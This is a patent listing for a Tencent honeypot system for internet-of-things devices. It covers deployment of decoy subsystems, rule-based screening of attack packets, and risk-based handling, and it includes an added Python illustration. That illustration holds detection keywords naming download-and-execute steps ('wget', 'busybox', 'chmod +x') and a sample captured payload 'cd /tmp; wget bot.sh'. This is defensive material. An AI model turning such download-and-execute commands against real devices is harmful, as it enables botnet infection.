CN114765553A - Security management method and device for access data, computer equipment and storage medium - Google Patents


Info

Publication number
CN114765553A
Authority
CN
China
Prior art keywords
attack
data packet
subsystem
induction
inducing
Prior art date
Legal status
Granted
Application number
CN202110032177.XA
Other languages
Chinese (zh)
Other versions
CN114765553B (en)
Inventor
李伟
赵天星
韩景维
张洪睿
张瑜龙
Current Assignee
Tencent Technology Shenzhen Co Ltd
Original Assignee
Tencent Technology Shenzhen Co Ltd
Priority date
Filing date
Publication date
Application filed by Tencent Technology Shenzhen Co Ltd
Priority to CN202110032177.XA
Publication of CN114765553A
Application granted
Publication of CN114765553B
Legal status: Active
Anticipated expiration

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416 Event detection, e.g. attack signature detection
    • H04L63/1425 Traffic logging, e.g. anomaly detection
    • H04L63/1433 Vulnerability analysis

Abstract

The embodiments of this application relate to the field of cloud technology and provide a security management method and apparatus, computer device and storage medium for access data that can identify and handle the attack behaviour of a visitor. Specifically, the access data packets received by at least one induction server in an attack induction system are obtained, where the attack induction system comprises at least two attack induction subsystems; the screening sequence and screening rule of each attack induction subsystem are determined according to that subsystem's attack induction capability; the attack data packets among the access data packets of each attack induction subsystem are determined based on the screening sequence and screening rule; and the attack data packets are processed based on their determined attack risk to the attack induction system. Because different attack induction subsystems attract a richer variety of attack behaviour, the multiple subsystems together form an attack induction system with strong capture capability, which widens the range and improves the accuracy of attack data identification.

Description

Security management method and device for access data, computer equipment and storage medium
Technical Field
The embodiment of the application relates to the technical field of cloud, in particular to a security management method and device for access data, computer equipment and a storage medium.
Background
In the related art, honeypots can be deployed in a network to trap specific network attack behaviour. In some technical fields, however, the number and variety of client devices are large; for example, because the networked objects in the internet of things are so diverse, the internet of things contains many kinds of client devices that can be attacked, and in large numbers.
Therefore, for the security of a system with a large number of client devices and types, a solution for analyzing and processing various attacks in the system so as to improve the security of the system is needed.
Disclosure of Invention
The embodiments of this application provide a security management method and apparatus, computer device and storage medium for access data that can effectively detect the various attacks that may occur in a system with a large number and variety of client devices, and thus help improve the security of that system.
In order to solve the foregoing technical problem, an embodiment of the present application provides a security management method for accessing data, where the method includes:
the method comprises the steps that an access data packet received by at least one induction server in an attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem;
if the currently screened attack induction subsystem is first in the screening sequence, determining the attack data packets among the access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packets it received;
if the currently screened attack induction subsystem is not first in the screening sequence, obtaining the sending users of the attack data packets already identified from the screening results of the previously screened attack induction subsystems, determining the access data packets sent by those users among the access data packets received by the currently screened subsystem to be attack data packets, and determining the attack data packets among the remaining unscreened access data packets based on the screening rule corresponding to the currently screened subsystem and those unscreened access data packets;
and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
In order to solve the foregoing technical problem, an embodiment of the present application further provides a security management apparatus for accessing data, where the apparatus includes:
a data packet acquisition unit configured to acquire the access data packets received by at least one induction server in an attack induction system, where the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected to the induction server;
the screening scheme determining unit is used for determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
a screening object determining unit, configured to determine a currently screened attack-inducing subsystem based on a screening order of each attack-inducing subsystem;
a first screening unit configured to, if the currently screened attack induction subsystem is first in the screening sequence, determine the attack data packets among the access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packets it received;
a second screening unit configured to, if the currently screened attack induction subsystem is not first in the screening sequence, obtain the sending users of the attack data packets already identified from the screening results of the previously screened attack induction subsystems, determine the access data packets sent by those users among the access data packets received by the currently screened subsystem to be attack data packets, and determine the attack data packets among the remaining unscreened access data packets based on the screening rule corresponding to the currently screened subsystem and those unscreened access data packets;
and the processing unit is used for processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
In an optional example, the security management apparatus for accessing data further includes a deployment unit configured to:
before a data packet acquisition unit acquires an access data packet received by at least one induction server in an attack induction system, acquiring a system deployment file of an attack induction subsystem in the attack induction system;
deploying the server inducing equipment of the attack inducing subsystem in a public network and deploying the inducing client equipment of the attack inducing subsystem in a corresponding client deployment network based on the deployment mode and the system deployment file corresponding to the attack inducing subsystem, wherein the server inducing equipment comprises an inducing server.
In one optional example, the attack inducement subsystem comprises at least two associated attack inducement subsystems that share a first inducement server;
a deployment unit to:
deploying the first induction server in a public network based on a deployment mode of at least one associated attack induction subsystem and a system deployment file;
deploying other server inducing devices except the first inducing server in the server inducing devices of the associated attack inducing subsystems according to the deployment mode and the system deployment file of each associated attack inducing subsystem;
and deploying the induced client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.
In an optional example, the correlated attack inducement subsystem comprises a first attack inducement subsystem, a deployment unit for:
simulating induced client equipment which needs to be set in a first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and a system deployment file;
and running a first target protocol in the public network that is required to simulate the service provided by the inducement client device.
In an optional example, the correlated attack inducement subsystem comprises a second attack inducement subsystem, a deployment unit for:
acquiring intranet access information of entity client equipment connected in a target intranet according to the deployment mode of the second attack induction subsystem and the system deployment file;
and determining the entity client equipment as induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the intranet access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.
In an optional example, the attack induction subsystem includes a third attack induction subsystem, and the deployment unit is configured to:
deploying server-side induction equipment based on a target Internet of things protocol in the public network based on the deployment mode and the system deployment file of the third attack induction subsystem;
simulating Internet of things protocol client equipment based on the target Internet of things protocol in a target intranet to obtain induction client equipment of the third attack induction subsystem;
and in the target intranet, simulating and operating an application program of the Internet of things protocol client equipment so as to simulate the operation of the Internet of things protocol client equipment.
In an optional example, the first screening unit is configured to:
acquiring a corresponding analysis data packet for each access data packet received by the currently screened attack induction subsystem;
acquiring access behavior characteristic information corresponding to the analysis data packet, and determining a suspicious analysis data packet in the analysis data packet based on the access behavior characteristic information;
and performing feature matching on the suspicious analysis data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on the matching result.
In an optional example, the first screening unit is configured to:
acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;
acquiring access characteristics of a sending user of the analysis data packet based on the data of the analysis data packet;
and if the protocol for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack inducing subsystem and/or the corresponding access characteristic accords with the specific access characteristic of a preset suspicious user in the screening rule corresponding to the currently screened attack inducing subsystem, determining that the analyzed data packet is a suspicious analyzed data packet.
In an optional example, the first screening unit is configured to:
performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule corresponding to the currently screened attack induction subsystem;
determining the suspicious analyzed data packet which is successfully matched as a high suspicious analyzed data packet;
and determining an attack data packet in the access data packet based on the high suspicious analysis data packet.
In an optional example, the screening unit is configured to determine the access data packet corresponding to a highly suspicious analysis data packet to be an attack data packet if:
the payload of the highly suspicious analysis data packet contains the vulnerability features of a preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the content associated with the internet of things protocol in the highly suspicious analysis data packet shows the attack features against the internet of things protocol in that screening rule; and/or the data of the highly suspicious analysis data packet shows the attack features of a preset network attack method in that screening rule.
In an optional example, the processing unit is to:
determining attack data packets of the same sending user aiming at all attack induction subsystems according to the information of the sending user of the attack data packets, and using the attack data packets as user-associated attack data packets of the sending user;
determining the attack risk of the user-associated attack data packets of the same sending user according to the number of the user-associated attack data packets of the same sending user, the number and the attack inducing capacity of the attack inducing subsystems attacked by the user-associated attack data packets and the screening rule hit by the user-associated attack data packets;
processing the user-associated attack data packets of the same sending user in the processing mode corresponding to their attack risk.
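The screening sequence, the escalation from suspicious to highly suspicious to attack packet, and the per-user risk scoring described in the method and apparatus above, as an added Python example that is not code from the patent or from Tencent; the packets, rule contents, capability scores, rule weights, thresholds and processing actions are all constructed assumptions:

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

@dataclass(frozen=True)
class Packet:  # one access packet stored by an induction server (constructed fields)
    subsystem: str  # attack induction subsystem that received it
    sender: str     # sending user identity
    protocol: str   # protocol parsed from the packet
    payload: str    # parsed payload text
    req_rate: int   # access characteristic: requests per minute from this sender

@dataclass(frozen=True)
class Rule:  # screening rule of one subsystem (all feature sets are constructed)
    protocols: Set[str]            # preset suspicious protocols
    max_req_rate: int              # above this, the sender's access behaviour is suspicious
    keywords: Set[str]             # keyword hit promotes suspicious -> highly suspicious
    vuln_features: Set[str]        # payload features of preset vulnerabilities
    iot_attack_features: Set[str]  # attack features against the IoT protocol
    method_features: Set[str]      # features of preset network attack methods

# Assumed attack induction capability per subsystem; the stronger ones are screened first.
CAPABILITY: Dict[str, int] = {"sub_low": 1, "sub_high": 3, "sub_mid": 2}
_COMMON = dict(max_req_rate=20, keywords={"admin", "root", "wget", "busybox"},
               vuln_features={"../../etc/passwd", "cgi-bin/"},
               iot_attack_features={"$SYS/#", "CONNECT flood"},
               method_features={"wget", "chmod +x", "busybox"})
RULES: Dict[str, Rule] = {  # one rule per subsystem; here they differ only by protocol
    "sub_high": Rule(protocols={"telnet", "mqtt"}, **_COMMON),
    "sub_mid": Rule(protocols={"telnet"}, **_COMMON),
    "sub_low": Rule(protocols={"mqtt"}, **_COMMON),
}
# Assumed weight of each rule hit when the attack risk is scored.
RULE_WEIGHT = {"vulnerability": 3, "iot-protocol": 3, "attack-method": 2, "known-attacker": 1}

def screening_order(capability: Dict[str, int]) -> List[str]:
    # Subsystems ordered by attack induction capability, strongest first.
    return sorted(capability, key=lambda s: capability[s], reverse=True)

def is_suspicious(pkt: Packet, rule: Rule) -> bool:  # preset protocol and/or access characteristic
    return pkt.protocol in rule.protocols or pkt.req_rate > rule.max_req_rate

def is_highly_suspicious(pkt: Packet, rule: Rule) -> bool:  # keyword match on a suspicious packet
    return any(k in pkt.payload for k in rule.keywords)

def matched_rule(pkt: Packet, rule: Rule) -> str:
    """Name of the first attack feature class found in the payload, '' if none."""
    for name, feats in (("vulnerability", rule.vuln_features),
                        ("iot-protocol", rule.iot_attack_features),
                        ("attack-method", rule.method_features)):
        if any(f in pkt.payload for f in feats):
            return name
    return ""

def screen(packets: List[Packet], rules: Dict[str, Rule],
           capability: Dict[str, int]) -> List[Tuple[Packet, str]]:
    """Screen each subsystem in capability order; return (packet, rule hit) pairs."""
    attacks: List[Tuple[Packet, str]] = []
    known_attackers: Set[str] = set()
    for idx, sub in enumerate(screening_order(capability)):
        received = [p for p in packets if p.subsystem == sub]
        unscreened = received
        if idx > 0:
            # Not first: packets from senders already identified by an earlier subsystem are attacks.
            attacks += [(p, "known-attacker") for p in received if p.sender in known_attackers]
            unscreened = [p for p in received if p.sender not in known_attackers]
        for p in unscreened:
            if is_suspicious(p, rules[sub]) and is_highly_suspicious(p, rules[sub]):
                hit = matched_rule(p, rules[sub])
                if hit:
                    attacks.append((p, hit))
                    known_attackers.add(p.sender)
    return attacks

def attack_risk(attacks: List[Tuple[Packet, str]],
                capability: Dict[str, int]) -> Dict[str, Tuple[int, str, str]]:
    """Per sending user: (score, risk level, processing action), scored from the number
    of user-associated attack packets, the subsystems attacked and the rules hit."""
    by_user: Dict[str, List[Tuple[Packet, str]]] = {}
    for p, hit in attacks:
        by_user.setdefault(p.sender, []).append((p, hit))
    result = {}
    for user, items in by_user.items():
        subs = {p.subsystem for p, _ in items}
        score = len(items) + sum(capability[s] for s in subs) + sum(RULE_WEIGHT[h] for _, h in items)
        level = "high" if score >= 8 else "medium" if score >= 4 else "low"
        action = {"high": "block sender", "medium": "rate-limit and alert", "low": "log only"}[level]
        result[user] = (score, level, action)
    return result

SAMPLE_PACKETS = [  # constructed sample traffic, not captured data
    Packet("sub_high", "u1", "telnet", "login admin; cd /tmp; wget bot.sh", 5),
    Packet("sub_high", "u2", "http", "GET /index.html", 3),
    Packet("sub_mid", "u1", "http", "GET /status", 2),               # u1 already identified
    Packet("sub_mid", "u3", "telnet", "root ../../etc/passwd", 4),
    Packet("sub_mid", "u4", "http", "GET /login", 50),               # high rate but no keyword
    Packet("sub_low", "u3", "mqtt", "SUBSCRIBE $SYS/#", 1),          # u3 already identified
    Packet("sub_low", "u5", "mqtt", "PUBLISH admin/cmd busybox", 1),
    Packet("sub_low", "u6", "mqtt", "PUBLISH sensors/temp 21.5", 2),
]
```

Running `screen(SAMPLE_PACKETS, RULES, CAPABILITY)` shows the point of the sequence: u1's harmless-looking `GET /status` on sub_mid and u3's MQTT subscription on sub_low are flagged only because an earlier, stronger subsystem already identified those senders.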
In an optional example, the apparatus further includes a statistics unit configured to:
acquiring statistical information of the attack data packet on at least one abnormal traffic statistical dimension based on data in the analysis data packet of the attack data packet;
and generating an abnormal flow statistic report based on the statistic information.
In an optional example, the security management apparatus for accessing data further includes: and the information sending unit is used for sending the abnormal flow statistic report to the management terminal when an abnormal flow checking instruction sent by the management terminal is received after the processing unit generates the abnormal flow statistic report based on the statistic information, so that the management terminal can display an abnormal flow checking page based on the abnormal flow statistic report.
In some embodiments of the present invention, there may also be provided a computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the steps of the method as described above when executing the computer program.
In some embodiments of the invention, there may also be provided a storage medium having stored thereon a computer program which, when run on a computer, causes the computer to perform the steps of the method as described above.
With the scheme provided by the embodiments of this application, the access data packets received by at least one induction server in the attack induction system can be obtained, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to it; the screening sequence and screening rule of each attack induction subsystem are determined according to its attack induction capability; the data packets of each attack induction subsystem are screened according to the screening sequence and screening rule to determine the attack data packets; and the attack data packets are processed based on their determined attack risk to the attack induction system. Because different attack induction subsystems attract a richer variety of attack behaviour, the induction servers in the attack induction system receive more attack data packets; these are detected in a targeted way by the attack data packet screening scheme corresponding to each subsystem, which yields more accurate detection results, helps discover vulnerabilities in more devices, and improves the security of a system with many types and numbers of client devices.
Drawings
Fig. 1 is a schematic diagram of a network architecture in which the present solution is implemented in the embodiment of the present application;
FIG. 2a is a schematic flow chart illustrating a security management method for access data according to an embodiment of the present application;
FIG. 2b is a schematic structural diagram of a security management system for accessing data according to an embodiment of the present application;
FIG. 2c is another schematic diagram of a security management system for accessing data according to an embodiment of the present application;
fig. 2d is a schematic diagram illustrating screening of attack packets in the embodiment of the present application;
FIG. 3 is a detailed flowchart of a security management method for access data according to an embodiment of the present application;
FIG. 4 is a schematic structural diagram of a security management device for accessing data in an embodiment of the present application;
fig. 5 is a schematic structural diagram of a computer device in an embodiment of the present application.
Detailed Description
The terms "first," "second," and the like in the description and in the claims of the embodiments of the application and in the drawings described above are used for distinguishing between similar elements and not necessarily for describing a particular sequential or chronological order. It will be appreciated that the data so used may be interchanged under appropriate circumstances such that the embodiments described herein may be practiced otherwise than as specifically illustrated or described herein. Furthermore, the terms "comprise" and "have," and any variations thereof, are intended to cover non-exclusive inclusions, such that a process, method, system, article, or apparatus that comprises a list of steps or modules is not necessarily limited to those steps or modules expressly listed, but may include other steps or modules not expressly listed or inherent to such process, method, article, or apparatus, such that the division of modules presented in the present application is merely a logical division and may be implemented in a practical application in a different manner, such that multiple modules may be combined or integrated into another system or some features may be omitted or not implemented, and such that couplings or direct couplings or communicative connections shown or discussed may be through interfaces, indirect couplings or communicative connections between modules may be electrical or the like, the embodiments of the present application are not limited. Moreover, the modules or sub-modules described as separate components may or may not be physically separated, may or may not be physical modules, or may be distributed in a plurality of circuit modules, and some or all of the modules may be selected according to actual needs to achieve the purpose of the embodiments of the present application.
The embodiment of the application provides a security management method and device for access data, computer equipment and a storage medium.
In this embodiment, the computer device may be a terminal or a server, and the terminal may include a mobile terminal and a fixed terminal. The mobile terminal includes, but is not limited to, any terminal capable of running an online education course application, such as a smart phone, a tablet computer, a notebook computer, a smart car, and the like, and the fixed terminal includes, but is not limited to, a desktop computer, a smart television, and the like.
The server may be an independent physical server, a server cluster or a distributed system formed by a plurality of physical servers, or a cloud server providing basic cloud computing services such as a cloud service, a cloud database, cloud computing, a cloud function, cloud storage, a network service, cloud communication, a middleware service, a domain name service, a security service, a CDN, a big data and artificial intelligence platform, but is not limited thereto.
Referring to fig. 1, which shows a security management system for access data according to this embodiment, the system may include an attack induction system 10 and a laboratory server 20. The attack induction system 10 includes at least two attack induction subsystems 11, and each attack induction subsystem 11 includes at least one induction client device (not shown in fig. 1) and an induction server 111 able to access that induction client device; optionally, the induction client devices of different attack induction subsystems may be deployed in different ways.
Wherein, the laboratory server 20 and each inducement server 111 are connected via a network, such as a wireless network.
The induction server 111 of the present embodiment may receive the access packet from the access device, store the access packet, and transmit the stored access packet to the laboratory server 20 upon receiving the packet acquisition request of the laboratory server 20.
The laboratory server 20 may be configured to obtain the access data packets received by at least one induction server in the attack induction system, where the attack induction system includes at least two attack induction subsystems and each subsystem includes an induction server and at least one induction client device connected to it; determine the screening sequence and screening rule for the attack data packets of each attack induction subsystem according to that subsystem's attack induction capability; determine the currently screened attack induction subsystem from the screening sequence; if the currently screened subsystem is first in the screening sequence, determine the attack data packets among the access data packets it received based on its screening rule; if it is not first, obtain the sending users of the attack data packets already identified from the screening results of the previously screened subsystems, treat the access data packets those users sent to the currently screened subsystem as attack data packets, and determine the attack data packets among the remaining unscreened access data packets based on the currently screened subsystem's screening rule; and process the attack data packets based on their determined attack risk to the attack induction system.
The embodiment of the application provides a security management method for accessing data, which can be executed by a processor of a computer device.
Referring to fig. 2a, the method for securely managing access data may include:
201. the method comprises the steps that an access data packet received by at least one induction server in an attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
in this embodiment, the induction server in the attack induction subsystem has the capability of accessing the induction client device in the same attack induction subsystem.
In one example, the deployment modes of different attack induction subsystems, and of the induction client devices within them, may differ. The deployment mode in this embodiment may include the honeypot technology used when the attack induction subsystem is deployed and the way the induction client devices are set up in the subsystem. Different honeypot technologies give different deployment modes, and physical induction client devices are deployed differently from virtual ones.
The attack induction subsystem in this embodiment simulates the structure and functions of a specific system; its main role is to attract and capture the attack data packets aimed at that system, so its structure and composition are determined by those of the specific system.
For example, in one example, the attack inducement subsystem may be a disguised internet of things system constructed based on internet of things characteristics, which includes a server inducement device and an inducement client device.
In an attack induction subsystem, the server induction device may include devices required by a server in a real internet of things system, such as a server, a switch, and the like.
In one attack inducement subsystem, the client devices impersonated by the inducement client device may include devices located at the client in the real internet of things system, such as a router, a smart television, a camera, a smart refrigerator, and the like.
Of course, it is understood that in the same attack inducement subsystem, the server inducement device may access the inducement client device.
The attack induction subsystems in this embodiment can be implemented based on honeypot technology in the prior art, each attack induction subsystem can be regarded as a honeypot constructed based on characteristics of the internet of things, and the attack induction system in this embodiment can be regarded as a honeypot system composed of a plurality of honeypots.
A honeypot is an active network defence platform that simulates an enterprise's real network environment, real applications and real business logic and offers a realistic target. By exposing vulnerabilities and similar lures it draws the attacker in and delays them through deception, so that the attacker's behaviour can be identified and collected. Applied to the internet of things, it can reveal attack behaviour in that field and uncover more vulnerabilities in unknown devices, which helps deploy targeted protection in the real internet of things and improves its defensibility and security.
In this embodiment, the types of honeypots include, but are not limited to, low-interaction honeypots, medium-interaction honeypots, and high-interaction honeypots.
The low-interaction honeypot is mainly characterized by simulation: all the attack weaknesses and attack objects it presents to an attacker are not real product systems but simulations of various systems and the services they provide. Because its services are all simulated, the honeypot can only respond to attackers in a simple way and obtains very limited information, which also makes it the most secure type of honeypot.
The medium-interaction honeypot simulates various behaviors of a real operating system, provides more interaction and can obtain more information from the attacker's behavior. In this system of simulated behavior, the honeypot may appear indistinguishable from a real operating system, and it is an attractive attack target just as a real system is.
The high-interaction honeypot has a real operating system. Its advantage is that a real system is provided to the attacker, and because the system is deceptive and its data is authentic, more of the attacker's activities and behaviors can be recorded once the attacker obtains root privileges. Its disadvantage, of course, is that the possibility of intrusion is high, and if the whole high-interaction honeypot is compromised it becomes a springboard for the attacker's next attack.
In this embodiment, the attack induction subsystems may be built based on the honeypot technology described above. It can be understood that different attack induction subsystems may use the same type of honeypot technology, for example two attack induction subsystems may both be low-interaction honeypots while the deployment modes of their induction client devices differ.
In this embodiment, the induction server may be deployed based on cloud technology, for example based on cloud computing, cloud storage and the like within cloud technology.
Cloud technology is explained first. Cloud technology is a general term for the network technology, information technology, integration technology, management platform technology, application technology and the like applied in a cloud computing business model; it can form a resource pool that is used on demand and is flexible and convenient. Cloud computing technology will become an important support. Background services of technical network systems, such as video websites, picture websites and more web portals, require a large amount of computing and storage resources. With the rapid development and application of the internet industry, each article may have its own identification mark that needs to be transmitted to a background system for logic processing, data of different levels can be processed separately, and all kinds of industry data need strong system background support, which can only be realized through cloud computing.
Since many hacking attacks continuously send attack data packets, the number of data packets received by the induction server is generally large, and deploying the induction server based on cloud technology provides it with sufficient computing power.
Cloud computing, in the narrow sense, refers to a delivery and usage mode of IT infrastructure in which required resources are acquired over a network in an on-demand and easily extensible manner; in the broad sense, it refers to a delivery and usage mode of services in which required services are obtained over a network in an on-demand and easily extensible manner. Such services may be IT and software services, internet-related services, or other services. In this embodiment, the cloud computing service may provide the cloud server resources required to deploy the induction server. It can be understood that attack induction subsystems implemented with different honeypot technologies may require induction servers of different sizes, for example the required server ports, the protocols to be run and the services that may be provided to clients may differ, so implementing the induction server on a cloud server in this embodiment makes effective use of cloud server resources and avoids waste.
Cloud storage is a new concept extended and developed from the cloud computing concept. A distributed cloud storage system (hereinafter referred to as a storage system) refers to a storage system that, through functions such as cluster application, grid technology and distributed storage file systems, integrates a large number of storage devices of different types (also referred to as storage nodes) in a network through application software or application interfaces so that they work cooperatively, and provides data storage and service access functions to the outside. For example, the server stores an electronic map, a spatial unit, user data, and the like.
In this embodiment, the access data packet received by the induction server may be stored in a corresponding cloud database based on a cloud storage technology.
The induction server in this embodiment may be a server deployed on the public network, and the deployment network of the induction client device is not limited; it may be deployed on the public network or on some internal network as needed.
For the convenience of understanding the scheme of the present embodiment, the deployment scheme of the attack inducing system in the present embodiment is described herein.
In this embodiment, before step 201, the attack induction system may be deployed. Optionally, the scheme for deploying the attack induction system may include:
acquiring a system deployment file of an attack induction subsystem in the attack induction system;
based on the deployment mode and system deployment file corresponding to the attack induction subsystem, deploying the server-side induction device of the attack induction subsystem in the public network, and deploying the induction client device of the attack induction subsystem in the corresponding client deployment network, wherein the server-side induction device comprises an induction server.
The system deployment file of each attack induction subsystem may include a system deployment file of a server and a system deployment file of a client.
It is understood that the system deployment file of the server may include configuration information of the server inducing device, for example, a simulation program of the server inducing device, and the like. Of course, the system deployment files of the server may be different in different attack induction subsystems.
The system deployment files of the clients are generally different among different attack induction subsystems.
In this embodiment, the server-side induction device of the attack induction subsystem may be deployed based on the deployment mode and the system deployment file of the server, and then the corresponding induction client device may be deployed based on the system deployment file of the client on the basis that the server-side induction device has been deployed.
For example, on the basis that the server-side induction device is already deployed, the server port used by each induction client device in the same attack induction subsystem is determined based on the protocol and the computed port of the induction server, and the corresponding induction client device is deployed based on that server port, the deployment mode and the system deployment file of the client.
In one example, each attack inducement subsystem may be respectively deployed with a different inducement server, and the deployment order of the different inducement servers is not limited in the deployment process of the attack inducement subsystem.
In one example, the deployment of attack induction subsystems can be accelerated and resources saved by having a plurality of attack induction subsystems share an induction server.
Optionally, in one example, the attack induction subsystems comprise at least two associated attack induction subsystems that share a first induction server; the step of deploying, based on the deployment mode and the system deployment file corresponding to the attack induction subsystem, the server-side induction device of the attack induction subsystem in the public network and the induction client device of the attack induction subsystem in the corresponding client deployment network may include:
deploying the first induction server in the public network based on the deployment mode and the system deployment file of at least one associated attack induction subsystem;
deploying, according to the deployment mode and the system deployment file of each associated attack induction subsystem, the server-side induction devices of that associated attack induction subsystem other than the first induction server;
and deploying, according to the deployment mode and the system deployment file of each associated attack induction subsystem, the induction client devices of that associated attack induction subsystem in the corresponding client deployment network.
In this embodiment, in the associated attack induction subsystems, the system deployment files of the server may be completely the same, or at least the deployment files of the first induction server are the same.
In this embodiment, the first inducing server may be implemented based on a low-interaction honeypot technology or a medium-interaction honeypot technology, which is not limited in this embodiment.
In an example, the deployment order of the two associated attack inducement subsystems is not limited, and may be set as required, and the server-side inducement devices to be deployed in the two associated attack inducement subsystems may not be completely the same.
For example, one of the associated attack induction subsystems may be a low-interaction honeypot, and the other may be a real device honeypot (i.e., its server-side induction device is implemented based on a physical device) that reuses the induction server (or server-side induction device) of the low-interaction honeypot.
Optionally, in an example, the associated attack induction subsystems include a first attack induction subsystem, and the step "deploying, according to the deployment mode and the system deployment file of each associated attack induction subsystem, the induction client devices of each associated attack induction subsystem in the corresponding client deployment network" may include:
simulating, in the public network, the induction client devices to be set up in the first attack induction subsystem according to the deployment mode and the system deployment file of the first attack induction subsystem;
and running, in the public network, the first target protocol required to simulate the services provided by the induction client devices.
In this example, the induction server and the induction client device are both in the public network, so a user in the public network can access the induction client device through the induction server, and the induction server can obtain and store the access data packet of the user.
Wherein the first target protocol includes but is not limited to: HTTP (Hypertext Transfer Protocol), SSH (Secure Shell), the Telnet protocol, SIP (Session Initiation Protocol), FTP (File Transfer Protocol), and the like.
Wherein different protocols may be used to simulate different services provided by the client device, for example simulated HTTP for a user web login service, simulated SSH for a user command-line login service, simulated Telnet for a user command-line login service, and so on.
It can be understood that the protocols to be simulated may differ between induction client devices. For example, referring to fig. 2b, extranet server 1 is an induction server of this embodiment, and induction client devices such as a camera, a network phone and a router are deployed on the same public network corresponding to extranet server 1; the first target protocols corresponding to the camera include HTTP and Telnet, and the first target protocols corresponding to the network phone include HTTP and VoIP (Voice over Internet Protocol).
In an example, the step of "deploying, according to the deployment mode and the system deployment file of each associated attack induction subsystem, the induction client devices of each associated attack induction subsystem in the corresponding client deployment network" may further include:
simulating, in a target intranet, the induction client devices to be set up in the first attack induction subsystem according to the deployment mode and the system deployment file of the first attack induction subsystem; running, in the target intranet, the first target protocol required to simulate the services provided by the induction client devices;
and exposing the intranet access information of the induction client devices in the target intranet to the public network, so that a public network user can access the induction client devices through the first induction server.
In one example, the inducement client device includes a router having a public network IP address on a public network.
Wherein the exposure includes, but is not limited to, intranet penetration.
Optionally, the step of "exposing the intranet access information of the induction client device in the target intranet to the public network" may include: determining the entity client device as an induction client device of the second attack induction subsystem, acquiring the public network access information obtained after the intranet access information of the entity client device is mapped to the public network, and storing the public network access information in the first induction server.
For example, a first access information mapping table (such as a NAT mapping table) may be set for the induction client devices and stored in a network device, such as a router, to which the induction client devices connect. The mapping table contains the intranet access information (such as the intranet IP address and port) of each induction client device in the target intranet of the first attack induction subsystem and the public network access information obtained by mapping that intranet access information to the public network, where the public network access information includes a public network IP address (generally the router's public network IP address) and a port number. The public network access information of the induction client devices is sent to the first induction server and stored there. An attacking user on the public network can obtain the public network access information of an induction client device through the first induction server and send an access data packet using it; after receiving the access data packet, the first induction server forwards it to the router of the induction client device based on the public network access information, and the router forwards it to the induction client device in the target intranet based on the first access information mapping table.
Optionally, in this embodiment, the induction client device may be an entity device. The associated attack induction subsystems include a second attack induction subsystem, and the step of deploying, according to the deployment mode and the system deployment file of each associated attack induction subsystem, the induction client devices of each associated attack induction subsystem in the corresponding client deployment network may include:
acquiring the intranet access information of entity client devices connected in a target intranet according to the deployment mode and the system deployment file of the second attack induction subsystem;
and determining the entity client devices as induction client devices of the second attack induction subsystem, and exposing the intranet access information of the entity client devices in the public network.
Where the second attack inducement subsystem is a real device honeypot, in one example, the inducement server of the second attack inducement subsystem may be a different server than the first inducement server.
Of course, the first induction server is reused, so that the resource utilization rate and the system deployment efficiency can be improved. Optionally, in this embodiment, intranet access information of the entity client device in the target intranet may be read from the system deployment file, where the intranet access information includes, but is not limited to, information such as an IP address of the entity client device in the target intranet.
The manner of exposing intranet access information of the entity client device to the public network includes, but is not limited to, intranet penetration.
For example, the entity client devices include terminal devices used by users and network devices such as gateway devices. A second access information mapping table (e.g., a NAT mapping table) may be set for the induction client devices in the second attack induction subsystem, containing the intranet access information (e.g., the intranet IP address and port) of each induction client device in the target intranet and the public network IP address (typically the router's public network IP address) and port number obtained by mapping that intranet access information to the public network. The second access information mapping table may be stored in the gateway device, and the mapped public network IP address and port number of each induction client device are sent to the first induction server for storage, thereby implementing intranet penetration.
In one example, a high-interaction honeypot can be built to enhance the trapping ability of the attack inducing system to hackers.
Optionally, the attack induction subsystems include a third attack induction subsystem, and the step "based on the deployment mode and the system deployment file corresponding to the attack induction subsystem, deploying the server-side induction device of the attack induction subsystem in the public network, and deploying the induction client device of the attack induction subsystem in the corresponding client deployment network" includes:
deploying, in the public network, a server-side induction device based on a target internet of things protocol according to the deployment mode and the system deployment file of the third attack induction subsystem, wherein the server-side induction device comprises a second induction server;
simulating, in a target intranet, internet of things protocol client devices based on the target internet of things protocol to obtain the induction client devices of the third attack induction subsystem;
and, in the target intranet, simulating the application programs of the internet of things protocol client devices so as to simulate the operation of the internet of things protocol client devices.
In one example, the second inducement server is different from the first inducement server.
